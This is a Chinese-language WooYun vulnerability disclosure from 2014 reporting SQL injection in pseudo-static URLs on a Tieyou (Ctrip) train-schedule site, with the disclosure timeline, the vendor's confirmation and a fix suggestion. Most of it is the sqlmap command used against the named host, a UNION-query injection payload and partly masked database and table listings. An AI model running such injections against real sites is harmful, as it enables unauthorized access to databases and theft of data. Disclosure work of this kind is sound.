漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-050909
漏洞标题:铁友网某站SQL注射可致所有数据库信息泄露
相关厂商:铁友网
漏洞作者: lxj616
提交时间:2014-02-14 12:06
修复时间:2014-03-31 12:07
公开时间:2014-03-31 12:07
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-14: 细节已通知厂商并且等待厂商处理中
2014-02-14: 厂商已经确认,细节仅向厂商公开
2014-02-24: 细节向核心白帽子及相关领域专家公开
2014-03-06: 细节向普通白帽子公开
2014-03-16: 细节向实习白帽子公开
2014-03-31: 细节向公众公开
简要描述:
铁友网某站SQL注射 可致所有数据库信息泄露
使用SQLMAP跑表足够证明其危害,不继续深入
详细说明:
漏洞位置为
由于其对于伪静态的处理存在缺陷,导致在解析uri中间的数字时引发注射
比如:
用SQLMAP 跑表
注:中间的星号是SQLMAP手动标注注射点的记号
还有好多数据库,足矣证明其危害,不再继续演示危害
漏洞证明:
用SQLMAP 跑表
注:中间的星号是SQLMAP手动标注注射点的记号
C:\Users\Administrator>sqlmap.py -u "http://checi.tieyou.com/2251/2253/*/2257.html" --tables
sqlmap identified the following injection points with a total of 122 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://checi.tieyou.com:80/2251/2253/' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7179667571,0x69524558475976445374,0x71696d6f71),NULL,NULL,NULL,NULL,NULL,NULL#/2257.html
---
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://checi.tieyou.com:80/2251/2253/' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7179667571,0x69524558475976445374,0x71696d6f71),NULL,NULL,NULL,NULL,NULL,NULL#/2257.html
---
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5
Database: league
[1 table]
+----------------------------------------------+
| tbl_Franchisee |
+----------------------------------------------+
Database: hotel
[40 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
*****tity *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****l *****
***** *****
***** *****
***** *****
*****etail *****
***** *****
*****price *****
*****y *****
*****y_12 *****
*****ee *****
***** *****
***** *****
*****icelist *****
***** *****
*****foentity *****
***** *****
***** *****
*****rate *****
*****e *****
*****dings *****
*****task *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****og *****
***** *****
+----------------------------------------------+
Database: flight
[5 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
*****u_to_c*****
|
+----------------------------------------------+
Database: log
[6 tables]
+----------------------------------------------+
| log |
|
***** *****
***** *****
***** *****
***** *****
*****ser_*****
|
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
*****long *****
*****by_instance *****
*****by_thread_by*****
*****global_by_ev*****
***** *****
*****_name *****
*****nce *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ead*****
|
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****type *****
+----------------------------------------------+
Database: address
[2 tables]
+----------------------------------------------+
| tbl_area |
| tbl_area_new |
+----------------------------------------------+
Database: analysis
[5 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
*****_route*****
|
+----------------------------------------------+
Database: lianmeng
[9 tables]
+----------------------------------------------+
| cronjoblogs |
| lm_admins |
| lm_commissions |
| lm_members |
| lm_orders |
| lm_pic_ads |
| lm_profits |
| lm_tixiansqs |
| lm_users |
+----------------------------------------------+
Database: configdb
[15 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****info*****
|
+----------------------------------------------+
Database: cacheMem
[5 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
*****che*****
4 |
+----------------------------------------------+
Database: clubCtrl
[21 tables]
+----------------------------------------------+
|
***** *****
***** *****
*****og *****
***** *****
***** *****
*****u *****
*****c *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****_addp*****
|
+----------------------------------------------+
Database: distributor
[6 tables]
+----------------------------------------------+
|
***** *****
***** *****
*****er *****
*****er_area *****
*****er_dateline *****
*****utor_li*****
|
+----------------------------------------------+
Database: news
[8 tables]
+----------------------------------------------+
|
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
+----------------------------------------------+
还有好多数据库,足矣证明其危害,不再继续演示危害
修复方案:
做好所有uri中的过滤,无论是否使用了伪静态
版权声明:转载请注明来源 lxj616@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2014-02-14 16:59
厂商回复:
感谢lxj616对携程安全的支持。
最新状态:
暂无